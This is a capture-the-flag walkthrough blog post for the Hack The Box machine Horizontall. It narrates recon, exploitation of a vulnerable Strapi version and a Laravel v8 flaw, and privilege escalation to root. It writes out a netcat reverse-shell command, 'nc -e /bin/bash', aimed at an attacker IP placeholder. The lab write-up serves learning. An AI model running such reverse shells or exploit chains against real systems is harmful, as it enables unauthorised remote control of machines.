Horizontall Walkthrough — HTB

Burak Ozlu
5 min readSep 10, 2021


This blog is a walkthrough for a currently active machine Horizontall on the Hack The Box Platform.

Part 1 — Port Scanning

First of all, I scanned the ports on the target machine to understand what was going on there.

OpenSSH and Nginx services are running on the ports. I checked if there was any vulnerability on these services or not, but there was nothing useful.

Part 2 — Discovery On The Website

I kept going and started to discover to find hidden directories and files on the website.

I couldn’t find any useful directory or file from this search. I remembered that this website had been running on the Nginx server, and there could be any other virtual hosts with vulnerabilities. I started a vhost search with the gobuster tool. You can find the brute force wordlist here.

It was as ı guessed. I revealed another website that had been published on the target machine. I opened the website on the browser and saw just a basic welcome text page. I made one more directory discovery.

First of all, I visited the reviews directory and saw some reviews from users.

I kept visiting other directories that were founded on the search as well, but the only thing I saw was a login page aside from this reviews directory. I thought ı could make a password brute force with the usernames ı saw on the reviews page. It was a complete waste of time. I lost a lot of time with this idea. After ı found out this, I started to look for something different. Finally, ı managed to think of checking the code.

I saw the comments on the page source and started to be suspicious. I opened the js codes and started to examine them. I searched “strapi” to see things about strapi functions. I was skipping, suddenly ı noticed 3.0.0-beta.17.4 after starpi-plugin-content-type-builder in codes.

I did a quick search and found this is a version that has multiple vulnerabilities.

Part 3 — Exploit

Musyoka Ian published a python code on the exploit-db. I used his python code to bypass authentication and RCE on the target machine.

I used netcat for this purpose but I didn’t use “nc -e /bin/bash [OUR IP ADDRESS] [PORT]” command to get a shell from the target as it is done most of the time. If you wonder the reason, I recommend you to read this cheat sheet. Also, you can find other possible commands to get a shell from the target machine.

I needed to get a TTY shell that’s why I have run a python command, accessed the user key.

Part 4 — Privilege Escalation

The first thing I thought was checking GTFOBins. I searched to find something useful, although ı found out what I needed, they were all useless because I didn’t have the password of starpi user. I decided to look for strapi user’s password for GTFOBins usage. I run linpeas.sh so I could have seen valuable files for my purpose. I used nc again for file transfer between machines. You can read how to do that here.

When I was scrolling down, suddenly I noticed the open ports on the local machine. Port 3306 is for MySql connection, port 1337 is for API calls, but port 8000 was strange. I ran a curl command to see what was going on there.

It was easy to notice that on port 8000 a Laravel v8 framework was working. I did a quick search about Laravel v8 framework.

It was what I needed. V8 is a version of Laravel that has a critical vulnerability. I searched for PoC code to run and become root user on the target machine. I found a PoC code that describes how to use it.

I have transferred the exploit code to run on the target machine, but I couldn’t access Github to run a git clone command. (If you have any solution for this please contact me.) I had to run exploit code from my attacking machine. I used port forwarding to be able to access port 8000. I recommend you watch this video if you are not sure about what port forwarding is.

This time I used another method for getting shell with netcat. I recommend you to learn about these techniques. They can be a lifesaver in some situations.

I am root now, I need to open root.txt in the /root directory and obtain root flag.

Thanks for reading :). You can be aware of new content by following me on Medium. If you have any questions, don’t hesitate to contact me.